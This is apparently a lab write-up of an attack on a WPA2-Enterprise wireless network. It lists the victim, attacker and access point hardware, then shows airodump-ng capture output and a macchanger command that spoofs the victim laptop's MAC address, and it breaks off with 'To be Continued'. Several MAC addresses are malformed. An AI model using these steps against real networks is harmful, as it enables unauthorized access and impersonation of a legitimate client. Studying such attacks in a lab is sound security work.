Victim:
Model: HP 6310b
CPU: Intel(R) Core(TM) Duo CPU P8700 2.53GHz
Memory: 4GB
OS: Windows 7
Wireless Interface: Intel(R) WiFi Link 5100 AGN
WiFi security:WPA2/WPA-Enterprise with EAP-TLS(Smartcard or certificate) authentication, TKIP encryption
MAC address: 00:1E:65:F8:BA:A8

Attacker:
Model: Dell Optiplex GX270
CPU: Intel Pentium 4 2.60 GHz
Memory: 1GB
OS: BT4F
Wireless Card: Alfa AWUS360H with 7dB omnidirectional antenna

AP:
Model: Linksys WRT54GL v1.1
Firmware: v4.30.11, Aug. 17, 2007
Wireless security and settings: WPA2-Enterprise, AES+TKIP encryption, QoS/WMM, Key Renewal Interval=900s
BSSID: 00:18:393:FB:A0

Radius server: FreeRADIUS-2.0.2, EAP-TLS authentication with X.509 certificates and DH key exchange

Run airodump-ng for WPA:
root@bt:~# airodump-ng -c 2 -w dump wlan2

CH 2 ][ Elapsed: 16 s ][ 2010-03-29 08:10 ][ WPA handshake: 00:18:393:FB:A0

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:393:FB:A0 -44 100 158 202 3 2 54e. WPA TKIP MGT cuckoo
00:1F:33:FF:39:52 -77 0 154 0 0 2 54e. OPN NETGEAR

BSSID STATION PWR Rate Lost Packets Probes

00:18:393:FB:A0 00:1E:65:F8:BA:A8 -30 54e-54e 1 143
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -36 0 - 1 101 125
^C
root@bt:~#

Run airodump-ng for WPA2:
root@bt:~# airodump-ng -c 2 -w dump wlan2

CH 2 ][ Elapsed: 3 mins ][ 2010-03-29 08:24 ][ WPA handshake: 00:18:393:FB:A0

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:393:FB:A0 -40 100 1887 4249 0 2 54e. WPA2 CCMP MGT cuckoo
00:1F:33:FF:39:52 -72 0 1833 0 0 2 54e. OPN NETGEAR
00:1E:65:F8:BA:A8 -37 0 0 0 0 113 -1 <length: 0>

BSSID STATION PWR Rate Lost Packets Probes

(not associated) 00:24:8C:57:8F3 -68 0 - 2 0 8
00:18:393:FB:A0 00:1E:65:F8:BA:A8 -29 54e-54e 0 4287 cuckoo
00:1F:33:FF:39:52 00:18:393:FB:A0 -36 1e- 1 0 8
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -37 0 - 1 159 1028
^C

Change attacker's MAC address:
root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger --mac 00:1E:65:F8:BA:A8 wlan0
Current MAC: 00:c0:ca:1b:f8:b7 (Alfa, Inc.)
Faked MAC: 00:1e:65:f8:ba:a8 (unknown)
root@bt:~# ifconfig wlan0 up
(To be Continued)